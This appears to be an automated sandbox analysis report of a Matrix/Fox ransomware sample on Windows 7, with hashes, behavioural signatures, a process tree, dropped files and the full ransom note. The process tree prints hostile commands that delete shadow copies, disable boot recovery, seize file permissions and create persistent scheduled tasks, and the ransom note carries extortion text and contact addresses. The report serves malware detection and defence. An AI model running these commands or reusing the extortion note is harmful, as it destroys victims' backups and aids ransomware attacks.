Overview

overview

10

Static

static

3

FoxRansomw...65.exe

windows7-x64

10

FoxRansomw...65.exe

windows10-2004-x64

10

FoxRansomw...a7.exe

windows7-x64

10

FoxRansomw...a7.exe

windows10-2004-x64

10

FoxRansomw...20.exe

windows7-x64

10

FoxRansomw...20.exe

windows10-2004-x64

10

FoxRansomw...0b.exe

windows7-x64

10

FoxRansomw...0b.exe

windows10-2004-x64

10

FoxRansomw...53.exe

windows7-x64

10

FoxRansomw...53.exe

windows10-2004-x64

10

FoxRansomw...b1.exe

windows7-x64

10

FoxRansomw...b1.exe

windows10-2004-x64

10

Resubmissions

03-04-2024 17:37

240403-v68g6sga2w 10

Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    03-04-2024 17:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

  • Size

    1.2MB

  • MD5

    76b640aa00354e46b29ca7ac2adfd732

  • SHA1

    afebf9d72ba7186afefebf4deda87675621b0b8b

  • SHA256

    0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

  • SHA512

    fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

  • SSDEEP

    24576:l/SA+2lraRrjSJR5ezmT1dM9tZBrPyvaNn:zXlabPyyN

Score
10/10
matrixdiscoveryevasionpersistenceransomwareupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf

Ransom Note
{\rtf1\ansi\ansicpg1251\deff0\nouicompat\deflang1049{\fonttbl{\f0\fnil\fcharset0 Calibri;}{\f1\fnil\fcharset204 Calibri;}} {\colortbl ;\red255\green0\blue0;\red0\green77\blue187;\red0\green176\blue80;\red0\green0\blue255;\red255\green255\blue255;} {\*\generator Riched20 10.0.15063}\viewkind4\uc1 \pard\ri-500\sa200\sl240\slmult1\qc\tx8804\ul\b\f0\fs28\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\ulnone\f1\lang1049\par \pard\ri-74\sl240\slmult1\tx8378\cf1\f0\fs24\lang1033 ATENTION!!!\par \cf0\b0 We are realy sorry to inform you that \b ALL YOUR FILES WERE ENCRYPTED \par \b0 by our automatic software. It became possible because of bad server security. \par \cf1\b ATENTION!!!\par \cf0\b0 Please don't worry, we can help you to \b RESTORE\b0 your server to original\par state and decrypt all your files quickly and safely!\par \b\par \cf2 INFORMATION!!!\par \cf0\b0 Files are not broken!!!\par Files were encrypted with AES-128+RSA-2048 crypto algorithms.\par There is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \b DELETED AFTER 7 DAYS! \b0 You will irrevocably lose all your data!\par \i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\par * Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\f1\lang1049\par \i0\f0\lang1033\par \cf3\b HOW TO RECOVER FILES???\par \cf0\b0 Please write us to the e-mail \i (write on English or use professional translator)\i0 :\par \pard\sl240\slmult1\b\fs28 [email protected] \par [email protected]\par [email protected]\cf1\fs24\par You have to send your message on each of our 3 emails\f1\lang1049 \f0\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\fs28\par \pard\ri-74\sl240\slmult1\tx8378\cf0\b0\fs24 \par In subject line write your personal ID:\par \b\fs28 6F4D6DB8A15D2E1A\par \b0\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \f1\lang1049\par \i * \f0\lang1033 \f1\lang1049 \f0\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \par \i0\par \cf1\b OUR ADVICE!!!\par \cf0\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\par \ul\b\par We will definitely reach an agreement ;) !!!\b0\par \ulnone\par \fs20 \par \par \par \par \par \par \par \pard\ri-74\sl240\slmult1\qc\tx8378\b\fs24 ALTERNATIVE COMMUNICATION\par \b0\fs20\par \pard\ri-74\sl240\slmult1\tx8378 \f1\lang1049 If y\'eeu did n\'eet r\'e5c\'e5iv\'e5 th\'e5 \'e0nsw\'e5r fr\'eem th\'e5 \'e0f\'eer\'e5cit\'e5d \'e5m\'e0il\f0\lang1033 s\f1\lang1049 f\'eer m\'eer\'e5 th\f0\lang1033 e\f1\lang1049 n \f0\lang1033 24\f1\lang1049 h\f0\lang1033 o\f1\lang1049 urs\f0\lang1033 please s\f1\lang1049\'e5\f0\lang1033 nd us Bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 s fr\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r thr\f1\lang1049\'ee\f0\lang1033 ugh th\f1\lang1049\'e5\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 bp\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 {{\field{\*\fldinst{HYPERLINK https://bitmsg.me }}{\fldrslt{https://bitmsg.me\ul0\cf0}}}}\f0\fs20 . B\f1\lang1049\'e5\f0\lang1033 l\f1\lang1049\'ee\f0\lang1033 w is \f1\lang1049\'e0\f0\lang1033 tut\f1\lang1049\'ee\f0\lang1033 ri\f1\lang1049\'e0\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 n h\f1\lang1049\'ee\f0\lang1033 w t\f1\lang1049\'ee\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nd bitm\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 vi\f1\lang1049\'e0\f0\lang1033 w\f1\lang1049\'e5\f0\lang1033 b br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r:\par 1. \f1\lang1049\'ce\f0\lang1033 p\f1\lang1049\'e5\f0\lang1033 n in y\f1\lang1049\'ee\f0\lang1033 ur br\f1\lang1049\'ee\f0\lang1033 ws\f1\lang1049\'e5\f0\lang1033 r th\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\fldrslt{https://bitmsg.me/users/sign_up\ul0\cf0}}}}\f0\fs20 \f1\lang1049\'e0\f0\lang1033 nd m\f1\lang1049\'e0\f0\lang1033 k\f1\lang1049\'e5\f0\lang1033 th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n b\f1\lang1049\'f3\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 ring n\f1\lang1049\'e0\f0\lang1033 m\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd.\par 2. \f1\lang1049\'d3\'ee\f0\lang1033 u must c\f1\lang1049\'ee\f0\lang1033 nfirm th\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 gistr\f1\lang1049\'e0\f0\lang1033 ti\f1\lang1049\'ee\f0\lang1033 n, r\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd f\f1\lang1049\'ee\f0\lang1033 ll\f1\lang1049\'ee\f0\lang1033 w th\f1\lang1049\'e5\f0\lang1033 instructi\f1\lang1049\'ee\f0\lang1033 ns th\f1\lang1049\'e0\f0\lang1033 t w\f1\lang1049\'e5\f0\lang1033 r\f1\lang1049\'e5\f0\lang1033 s\f1\lang1049\'e5\f0\lang1033 nt t\f1\lang1049\'ee\f0\lang1033 \f1\lang1049\'f3\'ee\f0\lang1033 u.\par 3. R\f1\lang1049\'e5\f0\lang1033 turn t\f1\lang1049\'ee\f0\lang1033 sit\f1\lang1049\'e5\f0\lang1033 \f1\lang1049\'e0\f0\lang1033 nd \f1\lang1049\'f1\f0\lang1033 lick \f1\lang1049 "\f0\lang1033 L\f1\lang1049\'ee\f0\lang1033 gin\f1\lang1049 "\f0\lang1033 l\f1\lang1049\'e0\f0\lang1033 b\f1\lang1049\'e5\f0\lang1033 l \f1\lang1049\'ee\f0\lang1033 r us\f1\lang1049\'e5\f0\lang1033 link {{\field{\*\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\fldrslt{https://bitmsg.me/users/sign_in\ul0\cf0}}}}\f0\fs20 , \f1\lang1049\'e5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur \f1\lang1049\'e5\f0\lang1033 m\f1\lang1049\'e0\f0\lang1033 il \f1\lang1049\'e0\f0\lang1033 nd p\f1\lang1049\'e0\f0\lang1033 ssw\f1\lang1049\'ee\f0\lang1033 rd \f1\lang1049\'e0\f0\lang1033 nd click th\f1\lang1049\'e5\f0\lang1033 "Sign in" butt\f1\lang1049\'ee\f0\lang1033 n. \f1\lang1049 \f0\lang1033\par 4. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "\f1\lang1049\'d1\f0\lang1033 r\f1\lang1049\'e5\'e0\f0\lang1033 t\f1\lang1049\'e5\f0\lang1033 R\f1\lang1049\'e0\f0\lang1033 nd\f1\lang1049\'ee\f0\lang1033 m \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss" butt\f1\lang1049\'ee\f0\lang1033 n.\par 5. \f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "N\f1\lang1049\'e5\f0\lang1033 w m\f1\lang1049\'e0\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\par \b 6. S\f1\lang1049\'e5\f0\lang1033 nding m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 :\par T\f1\lang1049\'ee\f0\lang1033 :\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'e0\f0\lang1033 ddr\f1\lang1049\'e5\f0\lang1033 ss: \b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\par \pard\sl240\slmult1 Subj\f1\lang1049\'e5\'f1\f0\lang1033 t:\b0 \f1\lang1049\'c5\f0\lang1033 nt\f1\lang1049\'e5\f0\lang1033 r \f1\lang1049\'f3\'ee\f0\lang1033 ur ID: \b 6F4D6DB8A15D2E1A\par M\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 : \b0 D\f1\lang1049\'e5\f0\lang1033 scrib\f1\lang1049\'e5\f0\lang1033 wh\f1\lang1049\'e0\f0\lang1033 t \f1\lang1049\'f3\'ee\f0\lang1033 u think n\f1\lang1049\'e5\f0\lang1033 c\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 r\f1\lang1049\'f3\f0\lang1033 .\par \pard\ri-74\sa200\sl240\slmult1\tx8378\f1\lang1049\'d1\f0\lang1033 lick th\f1\lang1049\'e5\f0\lang1033 "S\f1\lang1049\'e5\f0\lang1033 nd m\f1\lang1049\'e5\f0\lang1033 ss\f1\lang1049\'e0\f0\lang1033 g\f1\lang1049\'e5\f0\lang1033 " butt\f1\lang1049\'ee\f0\lang1033 n.\cf5\b\par \pard\sa200\sl240\slmult1\fs28 5L5w4B6A\cf0\f1\fs32\lang1049\par \par }
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

    ransomwarematrix
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
    ransomwareevasion
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
    discovery
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWWsc2q7.exe"
      2⤵
        PID:2884
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWWsc2q7.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWWsc2q7.exe" -n
        2⤵
        • Executes dropped EXE
        PID:2828
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DjhKOWmO.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2020
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1200
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aE0m4k00.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1508
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\aE0m4k00.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:1412
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:900
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
              PID:2100
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yhJaAchy.vbs"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:2616
            • C:\Windows\SysWOW64\wscript.exe
              wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\yhJaAchy.vbs"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2948
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\6UkurtQe.bat" /sc minute /mo 5 /RL HIGHEST /F
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3840
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\6UkurtQe.bat" /sc minute /mo 5 /RL HIGHEST /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:2332
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
                4⤵
                  PID:484
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /Run /I /tn DSHCA
                    5⤵
                      PID:4564
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\lDQhdGjJ.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2896
                • C:\Windows\SysWOW64\attrib.exe
                  attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
                  3⤵
                  • Views/modifies file attributes
                  PID:3780
                • C:\Windows\SysWOW64\cacls.exe
                  cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
                  3⤵
                    PID:1104
                  • C:\Windows\SysWOW64\takeown.exe
                    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
                    3⤵
                    • Modifies file permissions
                    PID:2712
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sDiREnBp.exe -accepteula "ENUtxt.pdf" -nobanner
                    3⤵
                    • Loads dropped DLL
                    PID:1068
                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sDiREnBp.exe
                      sDiREnBp.exe -accepteula "ENUtxt.pdf" -nobanner
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:3336
                      • C:\Users\Admin\AppData\Local\Temp\sDiREnBp64.exe
                        sDiREnBp.exe -accepteula "ENUtxt.pdf" -nobanner
                        5⤵
                        • Drops file in Drivers directory
                        • Sets service image path in registry
                        • Executes dropped EXE
                        • Enumerates connected drives
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: LoadsDriver
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3820
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {3C0C3648-2E2F-4915-9272-467400A03910} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
                1⤵
                  PID:3736
                  • C:\Windows\SYSTEM32\cmd.exe
                    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\6UkurtQe.bat"
                    2⤵
                      PID:4172
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin Delete Shadows /All /Quiet
                        3⤵
                        • Interacts with shadow copies
                        PID:3432
                      • C:\Windows\System32\Wbem\WMIC.exe
                        wmic SHADOWCOPY DELETE
                        3⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3016
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                        3⤵
                        • Drops file in System32 directory
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4776
                        • C:\Windows\system32\vssadmin.exe
                          "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                          4⤵
                          • Interacts with shadow copies
                          PID:3804
                      • C:\Windows\system32\bcdedit.exe
                        bcdedit /set {default} recoveryenabled No
                        3⤵
                        • Modifies boot configuration data using bcdedit
                        PID:3392
                      • C:\Windows\system32\bcdedit.exe
                        bcdedit /set {default} bootstatuspolicy ignoreallfailures
                        3⤵
                        • Modifies boot configuration data using bcdedit
                        PID:4664
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Delete /TN DSHCA /F
                        3⤵
                          PID:3448
                    • C:\Windows\system32\vssvc.exe
                      C:\Windows\system32\vssvc.exe
                      1⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4840

                    Network

                    MITRE ATT&CK Enterprise v15

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files (x86)\Microsoft Office\Office14\Document Parts\1033\14\#FOX_README#.rtf
                      Filesize

                      8KB

                      MD5

                      8429f56090147df8daec7690a89b4ee1

                      SHA1

                      900fe48ea8f5722a7e82aee463bec3f9565a246c

                      SHA256

                      9b346c2dfd9dbf9f5fe1233549c08d68029ee35a46a8827f32c048d4e56d782b

                      SHA512

                      ed439a05da6a9e5c1a0f47c974ddbc408475867aecd15937ef78e05c6cf6abdf1e1e363ba63d4d3206fd0e012af24c1cb3d9e0ff8dd73e6d9c096064450aec0f

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\DjhKOWmO.txt
                      Filesize

                      16B

                      MD5

                      17d432845dc7cb55ac69d75cf72f7f5d

                      SHA1

                      7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

                      SHA256

                      a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

                      SHA512

                      25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_6F4D6DB8A15D2E1A.txt
                      Filesize

                      16KB

                      MD5

                      ccc25679964bf76dbfcd5830c8d52461

                      SHA1

                      bd597544115bbb33d500a8f5e16d197c95918b9e

                      SHA256

                      e0dc41b463729ca5738bc45af4f7f3a6d47327825433d696d713cf903b5e5fd6

                      SHA512

                      caf67a3290867df41f5eb50868d752e8f1a39fbc714767feddfebe85421176340f25ff75968fc8195ba06da2c7ae87101267269d81f290eb3e0fb77cffbbd86a

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\lDQhdGjJ.bat
                      Filesize

                      246B

                      MD5

                      d1aba3245b98705bc1ef0baf340d72fa

                      SHA1

                      308b3bb73b88fade58ea35dffb89176a1b8d7b23

                      SHA256

                      e96b49539e0d78ff4eaa7d0074b690c1a7509b65c62342939d6ef22a4c49b822

                      SHA512

                      2a1b41a830947201593ea8d7d941fa1ef2f26c7afba1c71ae187e43f216b7c7180960c15102cd26693e53ca6d6d83b268371f225e5091567b6ba1ebce7efcce8

                      Download Submit

                    • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sDiREnBp.exe
                      Filesize

                      181KB

                      MD5

                      2f5b509929165fc13ceab9393c3b911d

                      SHA1

                      b016316132a6a277c5d8a4d7f3d6e2c769984052

                      SHA256

                      0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                      SHA512

                      c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\6UkurtQe.bat
                      Filesize

                      415B

                      MD5

                      16262aa4a8930750a3ea9cc555b3843a

                      SHA1

                      6dfff14b4eb084012e398f1e25e712ac961851c1

                      SHA256

                      ee63350e50183885410b2282d142cdbc2eeb7c98d76159bb54f34fee205600f8

                      SHA512

                      cddff734b97d593eb0be3d760607ab973091f35fff0eaf25d66572da79a38917a1e62c338a19908c451d5057be88c4d84471c36955dc6cab223856d0d85a215b

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W6WE9RKCOFH03HLX7PER.temp
                      Filesize

                      7KB

                      MD5

                      0b249a9cb53eff6d86bcdc9e267be18a

                      SHA1

                      b914ca5944b5f1e2d946a744913be1cf158cdf8f

                      SHA256

                      fdf739b7993c7f5d8316a86bef3e0ad6d9dfc0d592aec288610f4e1f4731749f

                      SHA512

                      22dbec2b7b2ed0b3a52ff283d274c9c0a33bac217035ab7925c1eb6383bcd922d667bfa3fe0fe7719128cbd8442b9170b78556bcbb8174c0287902e27da7a73c

                      Download Submit

                    • C:\Users\Admin\AppData\Roaming\yhJaAchy.vbs
                      Filesize

                      260B

                      MD5

                      d55030362db5f25d4034930e1887e9f0

                      SHA1

                      831b9f3a40481b4d6ae1b13a28af9f2687cb7cc0

                      SHA256

                      767d257eceb34dfc582025b82a3eed015f137cafee81b5f108d7ad46c1b35906

                      SHA512

                      266a1e18dfb4f3155a34e63772643ff2ac7796c3ec20daf30e332b48d9ac9858a0e1e12fcbe3050854eb149223229f23383fb04497a190d5b62ae9ec96c7a861

                      Download Submit

                    • \Users\Admin\AppData\Local\Temp\FoxRansomware\NWWsc2q7.exe
                      Filesize

                      1.2MB

                      MD5

                      76b640aa00354e46b29ca7ac2adfd732

                      SHA1

                      afebf9d72ba7186afefebf4deda87675621b0b8b

                      SHA256

                      0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7

                      SHA512

                      fecb15238714c786098f1dd0bb18696ab15634228ec3a48c900fd843e817d4c24607bdf6fb58e0321da3e1c1e49305ec919dddabbd34727acec8fbd6cb6fd552

                      Download Submit

                    • \Users\Admin\AppData\Local\Temp\sDiREnBp64.exe
                      Filesize

                      221KB

                      MD5

                      3026bc2448763d5a9862d864b97288ff

                      SHA1

                      7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                      SHA256

                      7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                      SHA512

                      d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                      Download Submit

                    • memory/1068-14672-0x0000000000250000-0x00000000002C7000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/1068-2532-0x0000000000250000-0x00000000002C7000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/1200-11-0x0000000073660000-0x0000000073C0B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/1200-12-0x0000000073660000-0x0000000073C0B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/1200-14-0x00000000025D0000-0x0000000002610000-memory.dmp

                      Filesize

                      256KB

                      Download

                    • memory/1200-13-0x00000000025D0000-0x0000000002610000-memory.dmp

                      Filesize

                      256KB

                      Download

                    • memory/1200-15-0x0000000073660000-0x0000000073C0B000-memory.dmp

                      Filesize

                      5.7MB

                      Download

                    • memory/2828-8-0x0000000000400000-0x0000000000538000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2956-14671-0x0000000000400000-0x0000000000538000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2956-11365-0x0000000000400000-0x0000000000538000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2956-5863-0x0000000000400000-0x0000000000538000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/2956-16-0x0000000000400000-0x0000000000538000-memory.dmp

                      Filesize

                      1.2MB

                      Download

                    • memory/3336-8269-0x0000000000400000-0x0000000000477000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/3336-2535-0x0000000000400000-0x0000000000477000-memory.dmp

                      Filesize

                      476KB

                      Download

                    • memory/4776-14680-0x000007FEF58E0000-0x000007FEF627D000-memory.dmp

                      Filesize

                      9.6MB

                      Download

                    • memory/4776-14681-0x00000000028F0000-0x0000000002970000-memory.dmp

                      Filesize

                      512KB

                      Download

                    • memory/4776-14682-0x000000001B1A0000-0x000000001B482000-memory.dmp

                      Filesize

                      2.9MB

                      Download

